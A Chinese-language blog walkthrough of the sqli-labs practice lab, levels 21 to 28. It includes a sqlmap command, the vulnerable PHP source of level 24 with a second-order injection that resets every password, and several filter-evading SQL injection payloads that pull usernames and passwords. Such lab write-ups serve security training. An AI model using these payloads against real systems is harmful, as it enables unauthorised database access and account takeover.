hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
  1. 首页
  2. 靶场
  3. sqli-labs
  4. 正文

sqli-labs 21-30

2023年10月7日 594点热度 0人点赞 0条评论

21

步骤

手动

注入点:

cookie

fig:

sqlmap

fig:

python sqlmap.py -r temp.txt --tamper base64encode.py --batch --dbms mysql

22

同上,')改为"

23

过滤了注释符,闭合后续单引号即可

sqlmap

fig:

24

步骤

手动

if (isset($_POST['submit']))
{

# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";

}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}

注册一个账号 admin' or 1=1 #

修改此账号密码,即修改了所有密码

sqlmap

fig:

25

步骤

手动

过滤了 and 和 or 可利用双写或者|| 代替

fig:

sqlmap

fig:

26

步骤

手动

过滤了 and 和 or 可利用双写或者|| 代替,并且过滤了注释符和空格还有斜杠

fig:

payload:1%27oorr(extractvalue(1,concat(0x7e,(select(database())),0x7e)))aandnd%20%271%27=%271

26a

步骤

手动

fig:

payload:?id=0%27)%0a%20union%a0%20select%a0%201,2,(select%a0%20group_concat(%20concat_ws(%200x7e,username,passwoorrd%20))%20%a0from%20(%a0security.users))%20;%00

27

步骤

手动

fig:

payload:0%27ununionion%0aseLect%0a1,2,3;%00

27a

步骤

手动

同上 '改成"

payload:0"ununionion%0aseLect%0a1,2,3;%00

28

步骤

手动

过滤union select不分大小写,可以在中间加all或者distinct

payload:?id=0%27)%0aunIon%0aall%0aseLect%0a1,2,3;%00

29-31

服务器(两层)架构

标签: 合集 靶场
最后更新:2023年10月7日

hu1y40

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复
文章目录
  • 21
    • 步骤
      • 手动
      • sqlmap
  • 22
  • 23
    • sqlmap
  • 24
    • 步骤
      • 手动
      • sqlmap
  • 25
    • 步骤
      • 手动
      • sqlmap
  • 26
    • 步骤
      • 手动
  • 26a
    • 步骤
      • 手动
  • 27
    • 步骤
      • 手动
  • 27a
    • 步骤
      • 手动
  • 28
    • 步骤
      • 手动
  • 29-31

分类目录

  • 0day安全
  • Bypass
  • C++Prime
  • CTF
  • DoS
  • DoS
  • FUZZ
  • iot
  • JSONP
  • MISC
  • MISC
  • PHP伪协议
  • Python
  • REVERSE
  • sqli-labs
  • SQL注入
  • Trick
  • UAF
  • WEB
  • WEB
  • XXE
  • 书籍阅读
  • 二进制
  • 代码阅读
  • 信息搜集
  • 信息泄露
  • 加密与解密
  • 双重释放漏洞
  • 反序列化
  • 命令执行
  • 命令执行
  • 堆溢出
  • 密码学
  • 弱加密
  • 提权漏洞
  • 整数溢出
  • 文件上传
  • 未分类
  • 栈溢出
  • 格式化字符串漏洞
  • 模型
  • 汇编语言
  • 渗透测试
  • 漏洞分析
  • 漏洞利用
  • 漏洞战争
  • 漏洞挖掘
  • 病毒分析
  • 越界读取
  • 路径遍历
  • 逻辑漏洞
  • 配置不当
  • 钓鱼
  • 靶场
最新 热点 随机
最新 热点 随机
加密算法 2023年度总结 RTSPServer StackOverflow Vulnerability FUZZ 总览篇 MP4Box 无限循环漏洞 CVE-2023-40477 Winrar RCE漏洞分析
加密与解密 第8章 上 CVE-2022-4565 Hutool资源消耗漏洞 CVE-2023-40477 Winrar RCE漏洞分析 Cobalt Strike 初探 CVE-2022-42252 Apache Tomcat请求走私漏洞 加密算法

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1